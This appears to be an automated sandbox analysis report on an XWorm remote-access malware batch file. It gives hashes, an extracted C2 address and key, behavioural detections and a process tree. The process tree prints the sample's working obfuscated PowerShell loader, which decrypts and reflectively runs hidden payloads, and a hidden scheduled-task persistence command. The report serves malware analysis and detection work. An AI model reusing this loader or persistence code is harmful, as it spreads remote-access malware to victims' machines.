Analysis
-
max time kernel
41s -
max time network
38s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
19-01-2025 17:34
Static task
static1
Behavioral task
behavioral1
Sample
$phantomClient.bat
Resource
win10ltsc2021-20250113-en
General
-
Target
$phantomClient.bat
-
Size
274KB
-
MD5
38f07463ec0e63e7a582c1bac3b2a5e8
-
SHA1
b7ef827021e088cb2ed7c2b2bf348da6f3d86d45
-
SHA256
cbce0de5b44bc1d63ac50c7da954f63f20148fd56547ddc1257282238a608bc8
-
SHA512
5ebca03ce18b8543f3e29c5cace28dd614891475dd4370cf18c243311d4a787d814ca6a424645fd61fa51faec3de91e9566eb5c4d1be7b91cc100454ee893ca5
-
SSDEEP
6144:4vbNSGoQZJ2gx4csj3NKoqHHFRWrHaQTnO:4DNSW2j1eYG
Malware Config
Extracted
xworm
3.0
florida-guild.gl.at.ply.gg:7717
5JpFVUe17SDvBwAb
-
Install_directory
%Public%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4956-102-0x00000243C6580000-0x00000243C658E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 11 4956 powershell.exe 14 4956 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1572 powershell.exe 2176 powershell.exe 4956 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\Users\\Public\\powershell.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1576956541-1869783662-2981982442-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1572 powershell.exe 1572 powershell.exe 2176 powershell.exe 2176 powershell.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 3416 taskmgr.exe 4956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 3416 taskmgr.exe Token: SeSystemProfilePrivilege 3416 taskmgr.exe Token: SeCreateGlobalPrivilege 3416 taskmgr.exe Token: SeIncreaseQuotaPrivilege 2176 powershell.exe Token: SeSecurityPrivilege 2176 powershell.exe Token: SeTakeOwnershipPrivilege 2176 powershell.exe Token: SeLoadDriverPrivilege 2176 powershell.exe Token: SeSystemProfilePrivilege 2176 powershell.exe Token: SeSystemtimePrivilege 2176 powershell.exe Token: SeProfSingleProcessPrivilege 2176 powershell.exe Token: SeIncBasePriorityPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeBackupPrivilege 2176 powershell.exe Token: SeRestorePrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeSystemEnvironmentPrivilege 2176 powershell.exe Token: SeRemoteShutdownPrivilege 2176 powershell.exe Token: SeUndockPrivilege 2176 powershell.exe Token: SeManageVolumePrivilege 2176 powershell.exe Token: 33 2176 powershell.exe Token: 34 2176 powershell.exe Token: 35 2176 powershell.exe Token: 36 2176 powershell.exe Token: SeIncreaseQuotaPrivilege 2176 powershell.exe Token: SeSecurityPrivilege 2176 powershell.exe Token: SeTakeOwnershipPrivilege 2176 powershell.exe Token: SeLoadDriverPrivilege 2176 powershell.exe Token: SeSystemProfilePrivilege 2176 powershell.exe Token: SeSystemtimePrivilege 2176 powershell.exe Token: SeProfSingleProcessPrivilege 2176 powershell.exe Token: SeIncBasePriorityPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeBackupPrivilege 2176 powershell.exe Token: SeRestorePrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeSystemEnvironmentPrivilege 2176 powershell.exe Token: SeRemoteShutdownPrivilege 2176 powershell.exe Token: SeUndockPrivilege 2176 powershell.exe Token: SeManageVolumePrivilege 2176 powershell.exe Token: 33 2176 powershell.exe Token: 34 2176 powershell.exe Token: 35 2176 powershell.exe Token: 36 2176 powershell.exe Token: SeIncreaseQuotaPrivilege 2176 powershell.exe Token: SeSecurityPrivilege 2176 powershell.exe Token: SeTakeOwnershipPrivilege 2176 powershell.exe Token: SeLoadDriverPrivilege 2176 powershell.exe Token: SeSystemProfilePrivilege 2176 powershell.exe Token: SeSystemtimePrivilege 2176 powershell.exe Token: SeProfSingleProcessPrivilege 2176 powershell.exe Token: SeIncBasePriorityPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeBackupPrivilege 2176 powershell.exe Token: SeRestorePrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeSystemEnvironmentPrivilege 2176 powershell.exe Token: SeRemoteShutdownPrivilege 2176 powershell.exe Token: SeUndockPrivilege 2176 powershell.exe Token: SeManageVolumePrivilege 2176 powershell.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
pid Process 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3688 Explorer.EXE 3688 Explorer.EXE 3688 Explorer.EXE -
Suspicious use of SendNotifyMessage 53 IoCs
pid Process 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3416 taskmgr.exe 3688 Explorer.EXE 3688 Explorer.EXE 3688 Explorer.EXE 3688 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3020 wrote to memory of 2184 3020 cmd.exe 83 PID 3020 wrote to memory of 2184 3020 cmd.exe 83 PID 3020 wrote to memory of 1572 3020 cmd.exe 84 PID 3020 wrote to memory of 1572 3020 cmd.exe 84 PID 1572 wrote to memory of 2176 1572 powershell.exe 85 PID 1572 wrote to memory of 2176 1572 powershell.exe 85 PID 1572 wrote to memory of 4788 1572 powershell.exe 90 PID 1572 wrote to memory of 4788 1572 powershell.exe 90 PID 4788 wrote to memory of 832 4788 WScript.exe 91 PID 4788 wrote to memory of 832 4788 WScript.exe 91 PID 832 wrote to memory of 2772 832 cmd.exe 93 PID 832 wrote to memory of 2772 832 cmd.exe 93 PID 832 wrote to memory of 4956 832 cmd.exe 94 PID 832 wrote to memory of 4956 832 cmd.exe 94 PID 4956 wrote to memory of 3416 4956 powershell.exe 88 PID 4956 wrote to memory of 3688 4956 powershell.exe 57 PID 4956 wrote to memory of 1768 4956 powershell.exe 31 PID 4956 wrote to memory of 1760 4956 powershell.exe 30 PID 4956 wrote to memory of 2940 4956 powershell.exe 51 PID 4956 wrote to memory of 1164 4956 powershell.exe 19 PID 4956 wrote to memory of 2344 4956 powershell.exe 41 PID 4956 wrote to memory of 2932 4956 powershell.exe 50 PID 4956 wrote to memory of 764 4956 powershell.exe 15 PID 4956 wrote to memory of 3716 4956 powershell.exe 71 PID 4956 wrote to memory of 2136 4956 powershell.exe 38 PID 4956 wrote to memory of 2836 4956 powershell.exe 74 PID 4956 wrote to memory of 1340 4956 powershell.exe 23 PID 4956 wrote to memory of 3112 4956 powershell.exe 53 PID 4956 wrote to memory of 936 4956 powershell.exe 11 PID 4956 wrote to memory of 2300 4956 powershell.exe 40 PID 4956 wrote to memory of 1904 4956 powershell.exe 32 PID 4956 wrote to memory of 2880 4956 powershell.exe 47 PID 4956 wrote to memory of 1696 4956 powershell.exe 29 PID 4956 wrote to memory of 2680 4956 powershell.exe 44 PID 4956 wrote to memory of 4984 4956 powershell.exe 72 PID 4956 wrote to memory of 1492 4956 powershell.exe 27 PID 4956 wrote to memory of 2672 4956 powershell.exe 43 PID 4956 wrote to memory of 2864 4956 powershell.exe 46 PID 4956 wrote to memory of 1484 4956 powershell.exe 26 PID 4956 wrote to memory of 1152 4956 powershell.exe 35 PID 4956 wrote to memory of 1472 4956 powershell.exe 25 PID 4956 wrote to memory of 3604 4956 powershell.exe 56 PID 4956 wrote to memory of 680 4956 powershell.exe 16 PID 4956 wrote to memory of 2916 4956 powershell.exe 49 PID 4956 wrote to memory of 1260 4956 powershell.exe 22 PID 4956 wrote to memory of 2044 4956 powershell.exe 34 PID 4956 wrote to memory of 3816 4956 powershell.exe 58 PID 4956 wrote to memory of 1448 4956 powershell.exe 24 PID 4956 wrote to memory of 1048 4956 powershell.exe 17 PID 4956 wrote to memory of 456 4956 powershell.exe 67 PID 4956 wrote to memory of 1236 4956 powershell.exe 21 PID 4956 wrote to memory of 2412 4956 powershell.exe 42 PID 4956 wrote to memory of 404 4956 powershell.exe 13 PID 4956 wrote to memory of 2008 4956 powershell.exe 33 PID 4956 wrote to memory of 816 4956 powershell.exe 9 PID 4956 wrote to memory of 416 4956 powershell.exe 14 PID 4956 wrote to memory of 1192 4956 powershell.exe 20 PID 4956 wrote to memory of 1388 4956 powershell.exe 68 PID 4956 wrote to memory of 1584 4956 powershell.exe 28 PID 4956 wrote to memory of 1976 4956 powershell.exe 37 PID 4956 wrote to memory of 988 4956 powershell.exe 12 PID 4956 wrote to memory of 1972 4956 powershell.exe 36 PID 816 wrote to memory of 2648 816 svchost.exe 96 PID 816 wrote to memory of 2648 816 svchost.exe 96
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:2648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:988
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2300
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3604
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$phantomClient.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+cN5uEbF73Ykg/jqicpTU05Fxhy2D0F5Q6q0/5siUL4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/wZXYHh9IukO2mFyhRqJmA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XvQLV=New-Object System.IO.MemoryStream(,$param_var); $AIqAx=New-Object System.IO.MemoryStream; $ScFgx=New-Object System.IO.Compression.GZipStream($XvQLV, [IO.Compression.CompressionMode]::Decompress); $ScFgx.CopyTo($AIqAx); $ScFgx.Dispose(); $XvQLV.Dispose(); $AIqAx.Dispose(); $AIqAx.ToArray();}function execute_function($param_var,$param2_var){ $RIwpH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kEZjO=$RIwpH.EntryPoint; $kEZjO.Invoke($null, $param2_var);}$wdsbs = 'C:\Users\Admin\AppData\Local\Temp\$phantomClient.bat';$host.UI.RawUI.WindowTitle = $wdsbs;$Duvoe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wdsbs).Split([Environment]::NewLine);foreach ($pmbwo in $Duvoe) { if ($pmbwo.StartsWith('KSAwBULSdFFkTPiGomjT')) { $mvcPS=$pmbwo.Substring(20); break; }}$payloads_var=[string[]]$mvcPS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_671_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_671.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_671.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_671.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+cN5uEbF73Ykg/jqicpTU05Fxhy2D0F5Q6q0/5siUL4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/wZXYHh9IukO2mFyhRqJmA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XvQLV=New-Object System.IO.MemoryStream(,$param_var); $AIqAx=New-Object System.IO.MemoryStream; $ScFgx=New-Object System.IO.Compression.GZipStream($XvQLV, [IO.Compression.CompressionMode]::Decompress); $ScFgx.CopyTo($AIqAx); $ScFgx.Dispose(); $XvQLV.Dispose(); $AIqAx.Dispose(); $AIqAx.ToArray();}function execute_function($param_var,$param2_var){ $RIwpH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kEZjO=$RIwpH.EntryPoint; $kEZjO.Invoke($null, $param2_var);}$wdsbs = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_671.bat';$host.UI.RawUI.WindowTitle = $wdsbs;$Duvoe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wdsbs).Split([Environment]::NewLine);foreach ($pmbwo in $Duvoe) { if ($pmbwo.StartsWith('KSAwBULSdFFkTPiGomjT')) { $mvcPS=$pmbwo.Substring(20); break; }}$payloads_var=[string[]]$mvcPS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4956
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3416
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
2KB
MD53ccf13786554a09feada0ddedbc8a646
SHA154d359350816173172d9a351b465207e4be88a8f
SHA256f436e158dc2fc703547bec5d5111f4a7d43b2b7bb02a16dbab812e48ce8e5ca9
SHA5126fb3d66ccc739b2a6d93b19af338b3b8cda9c3d431dc9343ccfb7c121fc7f4383aad7581e6e27f9bd482d40b970ab6a61a4365a8003a96b190a9e781b2ae91b3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
124B
MD55a38f3586af34ec671aa41e1e0935edd
SHA1e37f9d0e9deeae72700adaf3836ed0e71b6f9f23
SHA256f964c22c00b2cdcea081d77331896a7d85f62a7c595334ef139bfa7e43d1c875
SHA5129f922e09540fbbd0cf3d63cc5b9634e5f5b6c09c6d3bc8bfd4bde34787e810331a5efc3fc4db0de5e49663313cfba083b787bde158ecaba61f71b37ef3c5f8d0
-
Filesize
1005B
MD513960722480d496bfc3ca9eabb3d573d
SHA1d2e796326856c145fd76d714688808595deb7ead
SHA256d384fdd787de39771589755dba81873a4383989093c5e4a98433273306b692be
SHA512b8e46aebf647841c3d8a1dc37d5da7a5411c1ab9478b98e7a6f8f89dd293fc6f781e62f7895ceb2efeee38a1661647f8f4f3f7f58c30f643813b4d5f88616d00
-
Filesize
445KB
MD52e5a8590cf6848968fc23de3fa1e25f1
